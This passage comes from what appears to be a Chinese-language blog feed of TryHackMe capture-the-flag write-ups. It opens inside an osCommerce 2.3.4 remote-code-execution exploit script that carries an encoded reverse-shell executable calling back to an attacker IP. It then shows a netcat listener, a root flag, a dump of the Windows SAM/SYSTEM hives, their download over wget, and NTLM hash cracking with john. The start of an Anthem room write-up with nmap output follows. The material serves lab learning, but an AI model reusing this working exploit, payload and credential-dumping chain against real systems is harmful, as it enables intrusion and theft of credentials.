&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# fsockopen(&amp;#34;110.14.7.198&amp;#34;,7877);popen(&amp;#34;/bin/sh -i &amp;amp;3 2&amp;gt;&amp;amp;3&amp;#34;, &amp;#34;r&amp;#34;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;payload &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;); &lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# payload += &amp;#39;echo passthru(&amp;#34;type configure.php&amp;#34;);&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;payload &lt;span style="color:#ff79c6"&gt;+=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;header(&amp;#39;Content-type: text/plain&amp;#39;);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$ip = &amp;#34;10.14.7.198&amp;#34;; //change this
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$port = &amp;#34;7877&amp;#34;; //change this
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$payload = &amp;#34;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&amp;#34;;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$evalCode = gzinflate(base64_decode($payload));
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$evalArguments = &amp;#34; &amp;#34;.$port.&amp;#34; &amp;#34;.$ip;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$tmpdir =&amp;#34;C:&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\\&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;windows&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\\&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;temp&amp;#34;;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;chdir($tmpdir);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$res .= &amp;#34;Using dir : &amp;#34;.$tmpdir;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$filename = &amp;#34;D3fa1t_shell.exe&amp;#34;;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$file = fopen($filename, &amp;#39;wb&amp;#39;);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;fwrite($file, $evalCode);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;fclose($file);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$path = $filename;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$cmd = $path.$evalArguments;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$res .= &amp;#34;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;Executing : &amp;#34;.$cmd.&amp;#34;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;echo $res;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;$output = passthru($cmd);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;payload &lt;span style="color:#ff79c6"&gt;+=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;/*&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data[&lt;span style="color:#f1fa8c"&gt;&amp;#39;DB_DATABASE&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; payload
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# exploit it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;post(url&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;target_url, data&lt;span style="color:#ff79c6"&gt;=&lt;/span&gt;data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; r&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;status_code &lt;span style="color:#ff79c6"&gt;==&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;&amp;#34;[+] Successfully launched the exploit. Open the following URL to execute your code&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; base_url &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;install/includes/configure.php&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;print&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;&amp;#34;[-] Exploit did not execute as planned&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;本機端開 &lt;code&gt;nc -vlk 7877&lt;/code&gt; 進行監聽php 端執行下去，就拿到 shell 了!!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1be58-QHiq4TY.png"&gt;由於我們是 system 權限- 所以可以直接拿 admin 的 Root flag&lt;/li&gt;
&lt;li&gt;在 &lt;code&gt;C:\Users\Administrator\Desktop\root.txt.txt&lt;/code&gt;我猜應該是出題者手殘之類的，不小心打了兩次 &lt;code&gt;.txt&lt;/code&gt; 吧&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/893d9-ACyckKs.png"&gt;&lt;code&gt;THM{aea1e3ce6fe7f89e10cea833ae009bee}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="破密"&gt;破密&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;題目說需要破 &lt;code&gt;&amp;quot;Lab&amp;quot; user NTML hash decrypted&lt;/code&gt;我覺得題目打錯字，應該是說 NTLM 的 hash XD由於我們是 system 權限，很大，所以可以用指令直接匯出兩個 NTLM 相關檔案、&lt;code&gt;SAM&lt;/code&gt; 與 &lt;code&gt;SYSTEM&lt;/code&gt;- &lt;code&gt;reg save HKLM\SAM C:\sam&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;reg save HKLM\SYSTEM C:\system&lt;/code&gt;接下來把兩個檔案傳回本機- 這邊我用的方法是，直接把這兩個檔案放到 web 路徑中，用wget來載&lt;/li&gt;
&lt;li&gt;reverse shell&lt;code&gt;copy sam C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\include&lt;/code&gt;攻擊機- &lt;code&gt;wget http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/includes/sam&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;wget http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/includes/user&lt;/code&gt;將 &lt;code&gt;sam&lt;/code&gt;、&lt;code&gt;system&lt;/code&gt; 轉為 john 格式- &lt;code&gt;samdump2 system sam &amp;gt; j.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;題目問 &lt;code&gt;LAB&lt;/code&gt; 使用者，所以我們只需要保留這一行&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::&lt;/code&gt;而我們要破的真正 hash 是這個&lt;/li&gt;
&lt;li&gt;&lt;code&gt;30e87bf999828446a1c1209ddde4c450&lt;/code&gt;暴力破解- 其實暴力破解通常是下下策，往往會先試著Google之類尋找網路資源&lt;/li&gt;
&lt;li&gt;不過我 Google 這段 hash 值卻出現了一堆爆雷的內容，只好自己破解QQ&lt;/li&gt;
&lt;li&gt;通常我愛用 &lt;code&gt;rockyou.txt&lt;/code&gt; 但在這邊破不出來&lt;/li&gt;
&lt;li&gt;後來我採用了這一包https://github.com/danielmiessler/SecLists/blob/master/Passwords/xato-net-10-million-passwords-dup.txt&lt;/li&gt;
&lt;li&gt;不要問我為什麼……隨便找ㄉ&lt;code&gt;john j.txt --wordlist=/opt/xato-net-10-million-passwords-dup.txt --format=NT&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1ef2d-NSi3OCS.png"&gt;爆出密碼 &lt;code&gt;googleplus&lt;/code&gt;另外一種網路解法- &lt;a href="https://crackstation.net/"&gt;https://crackstation.net/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;輸入 &lt;code&gt;30e87bf999828446a1c1209ddde4c450&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c1184-tc69Bnj.png"&gt;&lt;/li&gt;
&lt;li&gt;回傳密碼為 &lt;code&gt;googleplus&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Anthem (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/29/anthem-try-hack-me-writeup/</link><pubDate>Thu, 29 Jul 2021 23:47:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/29/anthem-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/anthem"&gt;https://tryhackme.com/room/anthem&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.18.8&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;這題感覺有點廢，但還是寫一下WP好ㄌ&lt;/li&gt;
&lt;li&gt;機器開機要等將近5分鐘為什麼?&lt;/li&gt;
&lt;li&gt;不知道，反正我等了5分鐘才有畫面&lt;/li&gt;
&lt;li&gt;估計是因為 Windows 有點肥ㄅ&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;老梗 nmap -A 有開 80、3389&lt;/li&gt;
&lt;li&gt;有抓到 robots.txt&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 21:42 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.18.8
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.28s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 998 filtered ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| http-robots.txt: 4 disallowed entries
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_/bin/ /config/ /umbraco/ /umbraco_client/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Anthem.com - Welcome to our blog
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3389/tcp open ms-wbt-server Microsoft Terminal Services
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| rdp-ntlm-info:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Target_Name: WIN-LU09299160F
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS_Domain_Name: WIN-LU09299160F
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS_Computer_Name: WIN-LU09299160F
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| DNS_Domain_Name: WIN-LU09299160F
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| DNS_Computer_Name: WIN-LU09299160F
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Product_Version: 10.0.17763
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ System_Time: 2021-07-29T01:42:55+00:00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| ssl-cert: Subject: commonName=WIN-LU09299160F
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Not valid before: 2021-07-28T01:38:13
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_Not valid after: 2022-01-27T01:38:13
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ssl-date: 2021-07-29T01:43:01+00:00; +1s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;robots.txt還有叫做 umbraco 的東西Google 後發現他是一種 CMS&lt;/li&gt;
&lt;li&gt;看到一組奇怪密碼 &lt;code&gt;UmbracoIsTheBest!&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;UmbracoIsTheBest!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; # Use for all search robots
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; User-agent: *
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
